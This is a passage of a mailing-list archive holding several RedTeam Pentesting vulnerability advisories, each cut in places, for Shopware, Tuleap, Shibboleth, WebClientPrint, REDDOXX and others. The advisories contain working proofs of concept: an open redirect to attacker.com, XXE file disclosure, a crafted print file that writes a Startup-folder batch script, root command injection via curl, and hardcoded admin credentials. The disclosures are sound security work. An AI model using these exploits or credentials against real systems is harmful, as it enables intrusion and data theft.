To remove a product from a user's shopping cart, attackers may use the
following code. An id for the "sDelete" parameter may be obtained through a
prior call to ajaxCart.


$.getJSON(
  "https://example.net/checkout/ajaxDeleteArticleCart"+
  "?callback=?=4321"
).done(console.log);



Workaround
==

Support for JSONP should be removed from the cart AJAX API. This ensures, that
only JavaScript code from the same origin may access the API and respectively
the cart's contents. Furthermore, operations which change the state of the cart,
i.e. adding and removing products, must be protected with CSRF tokens.


Fix
===

Upgrade to Shopware newer than 5.4.0.


Security Risk
=

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart
to attackers may negatively impact the user's privacy. Furthermore, competing
eCommerce sites may use this information to improve sales. By adding or
removing products from a user's cart, attackers can negatively impact a user's
shopping experience and create support effort for the shop operator.


Timeline


2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released


References
==

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products 

[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap

2018-03-08 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary Redirect in Tuleap

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
redirect mechanism of the application lifecycle management platform
Tuleap.


Details
===

Product: Tuleap
Affected Versions: > 9.17.99.93
Fixed Versions: >= 9.17.99.93
Vulnerability Type: Arbitrary Redirect
Security Risk: low
Vendor URL: https://www.tuleap.org/
Vendor Status: fixed version released
Vendor Issue URL: https://tuleap.net/plugins/tracker/?aid=11136
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Tuleap is an open source tool for Scrum, Kanban, waterfall,
requirement management. Plan, track, code and collaborate on software
projects, you get everything at hand."
(from the Tuleap website [1])


More Details


RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
way Tuleap handles redirects. Usually this function is only used in
Tuleap after an successful login to assigned trackers, however the
redirect can be used indepented of whether a user is authenticated to
the application. While the application employs a URL filter to prevent
arbitrary redirects, the URL filter can be bypassed. This allows
attackers to redirect users to a different website, if a user opens an
attacker prepared URL. 

The filter can be bypassed by using protocol relative URLs, which omit
the leading protocol identifier. These arbitrary URLs are prefixed with
two slashes, which instructs the browser to use the same protocol as the
current page. This behaviour is specified in RFC 3986 [2] in section
5.4.


Proof of Concept


The following URL to an example installation of Tuleap will redirect
users to an attacker controlled website:

https://example.net/my/redirect.php?return_to=//attacker.com


Workaround
==

Currently no workaround is known.


Fix
===

Upgrade to at least tuleap version 9.17.99.93. 


Security Risk
=

Attackers may convice users to use a prepared link to access a valid
Tuleap instance, which then redirects users to a fake login page. This
can greatly increase the effectiveness of phishing attacks and may allow
attackers to steal user credentials more effectively.  However, no
credentials or sensitive information can be extracted directly.
Furthermore, the website to which users are going to be redirected will
be displayed in the browser location bar so that users may identify the
attack. Therefore, we rate this vulnerability with a low risk.

Nevertheless, it is very easy for attackers to identify this
vulnerability and create malicious URLs, which makes it very likely that
attackers might abuse this. 


Timeline


2018-01-02 Vulnerability identified
2018-01-11 Customer approved disclosure to vendor
2018-02-13 Vendor notified
2018-02-14 Vendor released fixed version
2018-03-05 Vendor made issue public 
2018-03-08 Advisory released 


References
==

[1] https://www.tuleap.org/what-is-tuleap
[2] https://tools.ietf.org/html/rfc3986


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2

2018-01-15 Thread RedTeam Pentesting GmbH
ST request which is then sent to the service provider.

The SAML response is accepted by the service provider. Due to the
vulnerability, the service provider application reports "taf" as the
value of the "uid" attribute.


Workaround
==

The use of XML encryption can serve as a mitigation for this
vulnerability but may still allow attacks in certain scenarios.


Fix
===

Manually update to the latest version [4] as described in the security
advisory published by Shibboleth [5]. Alternatively, use the operating
system's package management to receive the update [6].

Furthermore, a new version of the XMLTooling-C library (1.6.3) has been
released to address this vulnerability. DTD processing is now disabled
in the XML parser. Yet, some platforms ship with old parser versions
that do not allow DTD processing to be disabled, namely Red Hat and
CentOS.  Therefore, the "unmarshallContent" function has also been
hardened to mitigate the vulnerability on these platforms.


Security Risk
=

The key feature of Shibboleth, secure transfer of assertions, is
compromised. Therefore, the vulnerability is rated as a high risk. In
certain circumstances, this might lead to a complete bypass of
authorisation mechanisms. In practice, the risk for service providers is
highly dependent on the actual deployment of the Shibboleth
infrastructure: Sometimes, SAML responses are encrypted or not
transferred through a browser. In this case, an attacker is not able to
insert XML entities. Whether truncating SAML attribute values is
profitable for attackers also depends on the actual use and structure of
these values. Attackers may use an application's self-service features
to change their account's email to a manipulated but valid address.
Truncation of this email address in a SAML response could lead to access
to further accounts, effectively bypassing authorisation mechanisms.


Timeline


2017-11-06 Vulnerability identified
2017-11-13 Customer approved further research
2017-12-01 Further research conducted
2018-01-09 Customer approved disclosure to vendor
2018-01-10 Vendor notified
2018-01-12 Vendor released fixed version
2018-01-15 Advisory released


References
==

[1] https://www.shibboleth.net/
[2] https://www.w3.org/TR/xmldsig-core/
[3] https://github.com/UniconLabs/dockerized-idp-testbed
[4] https://shibboleth.net/downloads/service-provider/2.6.1/
[5] https://shibboleth.net/community/advisories/secadv_20180112.txt
[6] https://security-tracker.debian.org/tracker/CVE-2018-0486


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice

2017-11-03 Thread RedTeam Pentesting GmbH
sponse containing the passwd-file:



http://schemas.xmlsoap.org/soap/encoding/;
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/;
 xmlns:ns="urn:HelloService"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema;>
  http://schemas.xmlsoap.org/soap/encoding/;>

  Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]

  




Workaround
==

The Python package defusedxml [2] can be used to monkey patch the code to
prevent XML vulnerabilities.  The following workaround can be included in the
code, which prevents exploitation:


[...]
import defusedxml
defusedxml.defuse_stdlib()
[...]



Fix
===

Currently no fix is available.


Security Risk
=

Attackers are able to read local files on the server of the webservice
with the privileges of the webservice. Furthermore, attackers are able
to create HTTP request from the webservice to other services on the
Internet or the local network. It is likely that attackers are able to
gain access to credentials for database services used by the webservice.
Attackers may also be able to cause a denial-of-service attack against
the respective webservice. Depending on the data stored on the
vulnerable system and the relevance of the webservice, this
vulnerability may pose a high risk.


Timeline


2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced
   public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)


References
==

[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates

2017-08-22 Thread RedTeam Pentesting GmbH
isable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater or equal to 2.0.15.910[0].


Security Risk
=

WCPP does not verify TLS certificates when establishing HTTPS
connections. Man-in-the-middle attackers can therefore intercept those
connections with little effort. This may lead to a disclosure of
confidential information if sensitive documents are printed via WCPP.
Furthermore, the integrity of the printed documents cannot be guaranteed
as attackers are able to modify the documents in transit.

The described attack requires a man-in-the-middle position which is a
rather strong prerequisite. It is therefore estimated that the
vulnerability poses a medium risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
[1] http://www.dest-unreach.org/socat/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpDF7EEojbxY.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification

2017-08-22 Thread RedTeam Pentesting GmbH
proved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpmrIlY1JY3c.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates

2017-08-22 Thread RedTeam Pentesting GmbH
ace. This way, WCPP
functionality would not be disrupted and the attacked users may be
tricked to believe that a legitimate update has just occurred.

Because of the rarely fulfilled prerequisite of a browser running with
elevated or administrative privileges, this vulnerability is estimated
to pose a low risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpoS229iH0RT.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

2017-08-22 Thread RedTeam Pentesting GmbH
ctory is located at:

C:\Users\\AppData\Local\Temp\


Proof of Concept


During RedTeam Pentesting's analysis of WCPP it was found that malicious
CPJ files can be crafted that exploit a directory traversal bug in WCPP.
Such an example is given in the following hexdump, showing the file
rce-user.txt:

---
$ xxd rce-user.txt
: 6370 6a02 0201  0301  7763 7050  cpj.wcpP
0010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c  F:..\..\Roaming\
0020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77  Microsoft\Window
0030: 735c 5374 6172 7420 4d65 6e75 5c50 726f  s\Start Menu\Pro
0040: 6772 616d 735c 5374 6172 7475 705c 5265  grams\Startup\Re
0050: 6454 6561 6d2e 6261 747c 4065 6368 6f20  dTeam.bat|@echo
0060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d  off..cls..echo..
0070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43  .echo Proof-of-C
0080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d  oncept..echo ---
0090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65  -..e
00a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520  cho Remote Code
00b0: 4578 6563 7574 696f 6e20 7669 6120 5765  Execution via We
00c0: 6243 6c69 656e 7450 7269 6e74 2076 322e  bClientPrint v2.
00d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c  0.15.109..FOR /L
00e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829   %%x IN (1,1,18)
00f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274   DO echo...start
0100: 2063 616c 630d 0a70 6175 7365 0d0a 007c   calc..pause...|
---

In this example the filename is set to

..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

which is appended to the %TEMP% directory as follows:

C:\Users\\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup\RedTeam.bat

After resolving the "..\..\" sequence contained in the filename, this
yields the following path:

C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Startup\RedTeam.bat

As a consequence, the file content beginning at 0x5a is written to the
file RedTeam.bat in the current user's Startup folder. Therefore,
RedTeam.bat will be executed once the affected user logs in again. As a
proof of concept, a text will be displayed and Windows' calculator is
executed.

On one hand, this exploit can be executed when the following URL is
entered into the URL bar of a browser:

webclientprint:https://example.com/somedir/rce-user.txt

On the other hand, visiting users of a malicious website may be attacked
without user interaction when the webclientprint URL is embedded into an
iframe as follows:

---


https://example.com/somedir/rce-user.txt;>



---

The proof of concept printed above contains no valid license key, so a
notification window is shown when the exploit is executed. However, this
does not prevent successful exploitation. Attackers can easily add a
valid license key (e.g. by buying a license), so the window is not shown
and there is no visual indication of exploitation anymore.

The proof of concept is designed to print using the default printer.
Since WCPP does not seem to know how to print batch files, it exits
silently with the result that a successful attack does not print the
batch file.


Workaround
==

Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater or equal to 2.0.15.910[1].


Security Risk
=

If a user of WCPP visits an attacker-controlled website, arbitrary code
can be executed on the attacked user's computer. If a valid license key
is provided, there is no visual indication of the ongoing attack.
Furthermore, no user interaction is required to trigger the
vulnerability once a malicious website is visited. It is therefore
estimated that this vulnerability poses a high risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] http://webclientprint.azurewebsites.net/
[1] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
c

[FD] [RT-SA-2016-007] Cross-Site Scripting in TYPO3 Formhandler Extension

2017-07-27 Thread RedTeam Pentesting GmbH
can only
target individual users. All in all this is considered to be a
medium-risk vulnerability. Depending on the affected site the risk needs
to be adjusted accordingly.


Timeline

2016-09-22 Vulnerability identified
2016-10-07 Customer approved disclosure to vendor
2016-10-07 Vendor notified
2016-10-11 Preliminary advisory sent to vendor
2016-10-12 Vendor prepared patch and sent it to TYPO3 security team
2016-10-13 Customer needs time to test the patch and deploy it
2017-07-10 Customer finished testing and deployment of patch
2017-07-17 Vendor agreed to have patch published as PR on Github
2017-07-27 Vendor patch published as pull request for a possibly active fork
2017-07-27 Advisory released


References
==

[0] 
https://github.com/reinhardfuehricht/typo3-formhandler/blob/master/Classes/Interceptor/RemoveXSS.php#L63
[1] 
https://docs.typo3.org/typo3cms/extensions/core/8-dev/Changelog/8.2/Deprecation-76164-DeprecateRemoveXSS.html
[2] https://packetstormsecurity.com/files/137127/typo3-xssbypass.txt
[3] http://examples.typo3-formhandler.com/start/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpaqBAK0ZX3w.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
---

Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl
command-line:


$ curl --silent -H 'Accept: application/json' \
http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | \
sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | \
sed 's/\\n/\n/g'
uid=0(root) gid=0(root) groups=0(root)



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The diagnostic functions offered by the REDDOXX appliance allow attackers
to execute arbitrary commands. Since the commands are executed with root
privileges and no authentication is required, this is rated as a high
risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpQ3Vv7HVOHg.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
capture network traffic on the appliance's interfaces.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Tcpdump is one of these
tools. This tool can be used to capture network traffic on local
interfaces.

During a penetration test, it was discovered that this function, as well
as the other diagnostic functions, does not require authentication.


Proof of Concept


The following curl command-line can be used to start the capture
process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
http://www.example.com/api/v1/rws/diagnose/start
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


The following curl command-line stops the capture process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump"}' \
http://www.example.com/api/v1/rws/diagnose/stop
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


After the capture process is complete, the resulting capture file can be
downloaded without authentication:


$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
[...]
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: ‘tcpdump.cap’
tcpdump.cap 100%[===>]
1.72M [...]
2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]


None of these requests contain any credentials or cookies, which could
provide authentication.


Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The diagnostic functions of the REDDOXX appliance can be used without
authentication. This allows attackers to, for example, capture network
traffic. During a penetration test it was possible to capture multiple
emails and also POP3 login attempts with cleartext credentials. This is
rated as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made availab

[FD] [RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance

RedTeam Pentesting discovered an undocumented service account in the
REDDOXX appliance software, which allows attackers to access the
administrative interface of the appliance and change its configuration.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Hidden Service Account
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-007
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


Through the ISO provided on the vendor's homepage [1], it was possible
to analyze the files in a typical REDDOXX appliance [0] installation. As
part of this process, hardcoded credentials for a service account were
found in a .NET binary file. With these credentials, it was possible to
authenticate against the administrative interface.


Proof of Concept


The following curl command-line shows an unsuccessful login attempt with
invalid credentials against the administrative interface:


$ curl --silent -H 'Content-Type: application/json' --data '{"UserName": 
"redteam@local", "Password":"redteam"}' 
http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "ResponseStatus": {
"ErrorCode": "Unauthorized",
"Message": "Invalid UserName or Password",
"Errors": []
  }
}



When the credentials extracted from the binaries are provided however,
the webserver returns a session ID instead of an error message,
indicating a successful login:


$ curl --silent -H 'Content-Type: application/json' --data '{"UserName": 
"rdx-build-in-service-user@local", "Password":"rdx!1ntern4l"}' 
http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "SessionId": "Qm5odfSFB2tVh8De6HjD",
  "UserName": "rdx-build-in-service-user@local",
  "DisplayName": "",
  "ResponseStatus": {}
}



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The hidden service account allows attackers to authenticate to the
administrative interface of the appliance. With this level of access,
the appliance can be completely reconfigured. For example, core
functionalities, such as spam filtering or archiving, can be disabled.
RedTeam Pentesting assumes that the hidden service account is present
on all REDDOXX installations and rates its presence as a high risk.


